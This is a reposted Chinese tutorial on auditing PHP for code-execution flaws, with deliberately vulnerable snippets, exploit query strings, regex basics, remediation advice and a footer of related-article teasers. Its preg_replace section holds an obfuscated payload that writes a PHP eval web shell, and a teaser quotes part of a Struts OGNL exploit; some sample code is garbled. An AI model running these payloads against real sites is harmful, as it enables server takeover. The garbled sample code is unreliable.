2020/1/28 PHP代码审计之代码执行漏洞

0x00代码执行原理

应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行漏洞,这就是命令执行漏洞。
通常会使用escapeshellarg对参数进行处理,但在低版本的PHP库函数中该函数存在漏洞(原因:Windows上未对反斜杠进行过滤),需要注意。

0x01 挖掘思路

1:用户能够控制函数输入
2:存在可执行的危险函数

0x02 常见危险函数

1:eval和assert函数
2:preg_replace函数
3:回调函数
4:动态函数执行

0x03 eval和assert函数代码实例

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);//eval($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>

这里的话system可以执行代码,对来自cmd中获的变量没有过滤,导致代码执行。

exp:
?cmd=phpinfo();

0x04 回调函数

代码:

<?phpfunction callback(){??
$x = $_GET['cmd'];??
eval($x);//没做限制
}c
all_user_func(function 'callback',$x);//回调了函数
>?
常见回调函数:call_user_func()? call_user_func_array()?
array_map()等

上面代码分析一下,eval危险函数被封装在了callback全局函数中,我们在最后使用了
all_user_func(function ‘callback‘,$x);
回调危险函数最后达到代码执行

还有一种简单的回调:

<?php
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>

我们没有封装,而是直接使用了assert函数来进行回调,是的cmd中传入的代码执行。

 call_user_func — 把第一个参数作为回调函数调用,其余参数是回调函数的参数。
call_user_func_array — 调用回调函数,并把一个数组参数作为回调函数的参数

0x05 动态函数执行

1:定义一个函数
2:将函数名(字符串)赋值给一个变量
2:使用变量名代替函数名动态调用函数

代码:

<?php
$_GET['a']($_GET['b']);//接受get请求a的参数作为一个函数,b是作为a函数里的参数
?>
exp:

?a=assert&b=phpinfo()

代码2:

<?php
$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>
当提交http://127.0.0.1/create_function.php?foobar=system%28dir%29时,执行dir命令

0x06 正则表达式

代码:

<?php
//普通字符作为原子
$pattern = '/abc/';
$str = 'abcdefghijklmn';
preg_match_all($pattern,$str,$res);//以数组形式存储
var_dump($res);//会以数组形式显示出来
?>

代码2:

//特殊符号的字符作为原子
$pattern = '/\[php\]/';
$str = '[php]12345';
preg_match_all($pattern,$str,$res);
var_dump($res);

结果:

这里特别说明一下,我们要对php转义一下,加上\如果不加:



$pattern = '/[php]/';
$str = '[php]12345';
preg_match_all($pattern,$str,$res);
var_dump($res);

这样就不算是这种模式匹配了

代码3:

//通用字符作为原子
$pattern1 = '/\d/'; //0-9
$pattern2 = '/\D/'; //a-zA-Z
$str = '123132asaaaaa222';
$preg_match_all($pattern2,$str,$res);
var_dump($res);

代码4:

//自定义原子
$pattern1 = '/[aj]sp/'; //匹配[aj]中任意一个字符作为原子的asp jsp
$str = 'jjjjspspspsp';
preg_match_all($pattern1,$str,$res);
var_dump($res);

代码5

//限定符
$pattern1 = '/go*gle/'; // *匹配掐面出现原子次数0次 1次或多次
$pattern2 = '/go+gle/'; // +匹配前面出现的原子1次或多次
$pattern3 = '/go?gle/'; // ?匹配前面出现的原子0次或1次

$str = 'google';
preg_match_all($pattern3,$str,$res);
var_dump($res);

这里限定符还有贪婪模式非贪婪模式,这里我大一就已经学过了,就不再提了。

代码6

//边界限定
$pattern1 = '/^abc/'; // ^匹配输入字符开始的位置,必须是abc形式的开头
$pattern2 = '/abc^/'; // ^匹配输入字符结尾的位置,必须是abc形式的结尾
$pattern3 = '/^abc$/'; // ^$只匹配某字符
$str = 'abc2342dfads';
preg_match_all($pattern3,$str,$res);
var_dump($res);

代码7


//反向引用
$pattern = '/\d{4}(-)\d{2}\\1\d{2}/'; // \\1代表第一个()缓冲区
$str = '2020-01-28';
preg_match_all($pattern,$str,$res)
;var_dump($res);

0x07 preg_replace

mixed preg_replace(mixde $pattern,mixed $replacement,mixed $subject[,int $limit = -1[,int &$count]])

$pattern 正则匹配的内容 $pattern存在/e模式修正符修饰,允许代码执行

$replacement 用于替换的字符串或字符串数组

$subject 要进行搜索和替换的字符串或字符串数组

代码:

<?php
//?cmd=phpinfo()
@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");
?>

这里我们需要注意2点:
/e模式
必须匹配到正则才能代码执行

代码2:

<?php $a =str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]); ?>
**exp:

?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))**

**最终执行命令<?php assert(fputs(fopen(‘c.php‘,w),"<?php @eval($_POST[a]);?>"))?>**

0x08 代码执行修复

尽量不要执行外部的应用程序或命令

使用自定义函数或函数库来替代外部应用程序或命令的功能

使用escappeshellarg函数来处理命令的参数
使用sare_mode_exec_dir来指定可执行的文件路径

将执行的参数做白名单限制,在代码或配置文件中限制某些参数

原文地址:https://www.cnblogs.com/wangtanzhi/p/12237728.html

时间: 2024-10-10 00:52:45

2020/1/28 PHP代码审计之代码执行漏洞的相关文章

Office CVE-2017-8570远程代码执行漏洞复现

实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程,团队合作. 实验内容 Office CVE-2017-8570 CVE-2017-8570漏

Struts2再爆远程代码执行漏洞(S2-016)

Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码.Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行.  描述 影响版本 Struts 2.0.0 - Struts 2.3.15 报告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc. CVE编号 CVE-2013-2251 漏洞证明 参数会以OGN

Tomcat代码执行漏洞(CVE-2017-12615)的演绎及个人bypass

0x00 漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞. 漏洞CVE编号:CVE-2017-12615和CVE-2017-12616. 其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79 漏洞触发条件: 1,tomcat得架设在windows主机上 2,将readonly由默认值true设置为false.(开启http PUT 方法) 攻击者将有可能可通过精心构造的攻击请求向服务器上传

代码执行漏洞

代码执行是指攻击者通过浏览器或者其他客户端软件提交一些用户自己构造的php代码至服务器程序,服务器程序通过eval.assert.reg_replace等函数执行用户提交的php代码. 其实,我们平时所见到的SQL注入.xss等漏洞都是代码执行漏洞. 测试代码: <?php $a = $_GET['a']; eval ($a); //assert ($a); ?> 开启Firefox,输入:http://localhost:81/code_exec.php?a=phpinfo%28%29 We

php 168任意代码执行漏洞之php的Complex (curly) syntax

今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML 通过代码审计得知,最后会执行 eval("\$array[showurl]=\"$filename_b\";"); 而$filename_b最终值

关于发布的CVE-2013-2251漏洞,strust远程代码执行漏洞

(*该漏洞影响版本:Struts 2.0.0 – Struts 2.3.15) (*该博客仅仅只是记录我工作学习时遇到的问题,仅供参考!) (*如果,描述中可能存在错误,请多指教!) 在昨天在对我目前负责的那个项目进行日常维护的时候,系统被别人攻克,上传了一个.txt文件,他人可以直接访问这个项目下txt文件,就可以获取到txt文件内的内容. 首先,介绍下我目前维护的项目,使用的是strust2.1+hibernate3.0架构模式,也就是javaweb+SSH框架,不过为了简化,并没有添加sp

Android WebView远程代码执行漏洞简析

0x00 本文参考Android WebView 远程代码执行漏洞简析.代码地址为,https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo.下面我们分析代码. 0x01 首先列出项目工程目录: MainActivity.java的代码如下: public class MainActivity extends Activity { private WebView webView; private Uri mUr

Apache ActiveMQ Fileserver远程代码执行漏洞

扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程. 环境搭建: ActiveMQ 5.1.0 下载地址:http://activemq.apache.org/activemq-510-release.html 解压后,双击运行abtivemq.bat运行.(进入bin目录,根据自己的操作系统选择win32或win64,5.1.0只有win32目录) 访问8161端口: 漏洞利用

s2-048远程代码执行漏洞

在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在一处任意代码执行漏洞.当你的应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行. POC: name=%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)